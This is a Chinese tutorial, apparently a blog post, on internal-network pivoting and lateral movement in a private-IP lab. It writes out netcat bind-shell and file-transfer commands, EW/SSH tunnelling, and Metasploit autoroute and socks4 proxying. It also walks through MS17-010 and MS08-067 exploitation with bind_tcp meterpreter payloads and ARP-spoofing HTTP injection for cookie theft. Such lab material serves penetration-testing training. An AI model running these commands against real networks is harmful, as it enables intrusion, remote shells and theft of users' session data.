内网渗透-内网代理穿透和内网横向移动

Source

内网代理穿透和内网横向移动

前言

进入内网后,我们就要扫描内网中有哪些主机了,重点是我们外网是无法访问内网的主机的,所在网段是不一样的,这时就需要我们设置代理和路由进行访问内网的流量了。上一期讲解了信息收集的相关内容,收集网段,补丁和域中成员以及域控的信息,对以下的横向移动至关重要,对后期的提权做好了准备。

内网代理穿透

首先,我们介绍几种代理工具的使用

nc

nc是一个强大的端口转发工具
nc
建立通信
nc.exe -l -p 123(kali)
nc.exe 192.168.219.4 123(主机)

扫描端口 nc -vz -w 2 192.168.0.200 8001-8009
nc.exe -vz -w 2 192.168.219.4 8001-8009

传文件
nc.exe 192.168.231.128 123 < netcat-0.7.1.zip(本机,输出机)
nc -l -p 123 > netcat-0.7.1.zip(kali,输入机)

也可以进行反向连接
nc.exe 192.168.231.128 123 > 123.txt
nc -l -p 123 < 1.txt

nc反弹shell
靶机
nc.exe -l -p 123 -t -e cmd.exe
主机
nc.exe 192. 168 231.128 123(回弹了shell)

在公网监听
nc 192.168.231.128 5555(kali的地址和ip)
nc -lp 5555(kali本地监听5555端口)

termite(ew)

termite是一款强大的内网穿透工具,但由于被黑客利用,导致危险性太大,就停止使用,大家可以下载ew内网穿透工具进行测试,也是同样的效果。
http://rootkiter.com/Termite

(1)linux
上传后,chmod 777 agent_linux_i586
./agent_linux_i586 -l 123
监听

在win10主机上
agent_Win32.exe -c 192.168.231.128 -p 123

(2)window
在win10主机上
agent_Win32.exe -c 192.168.231.128 -p 123

在内网主机上
agent_Win32.exe -l 123

获得跳板机后,shell 123
在本机上
nc 127.0.0.1 123

ssh正向代理(A,B,C)

用于A不能访问C的问题,C是内网机器
三台机器kali,win7,win03
kali要访问到win03的网站,就需要用B进行转发

ssh -L 8001(A的端口):192.168.10.138:8001© root@192.168.8.143(B,win7)
意思是将C中的8001端口转发到kali的8001端口上,需要输入B的密码才可以转发成功

在kali中输入127.0.0.1:8001即可访问C中8001端口的服务了

ssh反向代理
ssh -R 192.168.10.138:8001:127.0.0.1:80 root@192.168.8.143

Linux查看端口
netstat -tnlp

msf设置路由和sock4代理访问内网流量

由于我的靶机中没有相应的漏洞利用,所以扫描到内网的主机也无法进行利用,所以,就借用师傅的打靶过程给大家演示一遍了,在以后打靶的时候也好有个思路可以利用。
(三级网络)
msf代理模块(在会话中执行)
(V1)
当我们那到内网的一台主机了(192.168.231.128),存在两个网段,也就是10.0的网段,就需要进行设置路由和sock4代理进行访问内网的流量了
(V2)
设置路由
run autoroute -s 192.168.10.0./24
扫网段
run post/windows/gather/arp_scanner RHOSTS=192.168.10.0./24
backgroup

端口扫描模块
search portscan

use 5
set rhosts 192.168.10.0/24
setg threads 50
options
run

找sock4代理模块
search socks4
use 0
sessions -l(找会话)
options

set srvhost 127.0.0.1(写本地的地址),1080
options

netstat -tnlp(查看端口是否占用,没有占用,直接run)
run

vi /etc/proxychains.conf
修改
sock4 127.0.0.1 1080

采用代理扫描
proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms* 192.168.10.137(ms*,扫所有smb的漏洞)
(必须添加参数,因为只可以正向传过去,不可以反向传过来)

扫描存在漏洞,搜索漏洞进行攻击
search ms17-010
use 3
options
set rhosts 192.168.10.137
run
执行不成功(因为默认的是反向连接,是不能反向连接的,只能正向连接)

set payload windows/x64/meterpreter/bind_tcp(我连他)
options
run
利用成功了

(V3)
设置路由
run autoroute -s 192.168.20.0./24
扫网段
run post/windows/gather/arp_scanner RHOSTS=192.168.20.0./24

search socks4
use 0
sessions -l(找会话)
options

set srvhost 127.0.0.1(写本地的地址),1081
options

netstat -tnlp(查看端口是否占用,没有占用,直接run)
run

vi /etc/proxychains.conf
在添加一个
sock4 127.0.0.1 1081
proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms* 192.168.20.128(内网的第二级网络)
search ms08-067
use 0
options
set rhosts 192.168.20.128
set payload windows/meterpreter/bind_tcp
options

show targets
set target 34
run
返回会话了
shell
exit
backgrounp

sessions -l
一共返回了三个会话,实验成功

内网横向移动

横向渗透的方法:
1.了解网络(信息收集)
分析网络中有哪些主机(pc,server /linux/winodows/打印机)
分析服务,分析端口
扫描器分析服务

服务攻击有哪些方法
1.爆破
2.漏洞 smb
3.欺骗
4.钓鱼

流量监听工具

wireshare(只能抓未加密的包文,可以访问内网的流量)
cain

这里cain跟wireshare是一样的,我的由于版本太老,总是抓不到用户的登录信息,这里就不给大家做演示了

wiresharke 抓取内网流量
过滤地址
http && ip.src192.168.231.134(原地址发出的)
http && ip.dst
192.168.231.134(发送到的目的地址)

Arp欺骗
NetFuke(实验)
Evil foca
ettercap

这里给大家讲一个ARP欺骗的NetFuke工具,可以结合钓鱼来使用,强制使用户跳转到另外的网站,进行获取cookie信息等等,不过,这个工具也只能win03可以使用,我在03机器上给大家演示一下吧。

这里他不管访问什么网站,都进行了欺骗,都是出现同一个页面,不过前提必须是http协议,https是进行了加密的,欺骗不了。

我们打开win03的NetFuke进行配置信息,进行欺骗。
在这里插入图片描述
点击嗅探配置
在这里插入图片描述
按我的打上对钩即可,不要选择ICMP选项,选择主动转发,在点击ARP欺骗
在这里插入图片描述
添加对应的嘻嘻和欺骗方式
在这里插入图片描述
在这里插入图片描述
点击http_inject后,进入后可以修改欺骗的内容
在这里插入图片描述
我们点击左上角的箭头,进行欺骗即可
在这里插入图片描述
我们看一下效果,当我们访问baidu.com的时候,返回了hello!!,说明欺骗成功了。我们在访问淘宝也是如此,借此我们利用钓鱼进行诱导用户进入另一个页面,进行获取cookie。也可以反弹shell提权等。
在这里插入图片描述

后记

内网代理穿透就不给大家演示了,因为工具已经大部分已经不能用了,所以就给大家演示了一个横向的Arp欺骗的工具了,横向移动和三级网络,其实就是设置路由和sock4代理进行监听和扫描内网的流量,这样才能为后面的提取和权限维持做铺垫,知识点比较多,下次给大家总结一下权限维持的知识吧。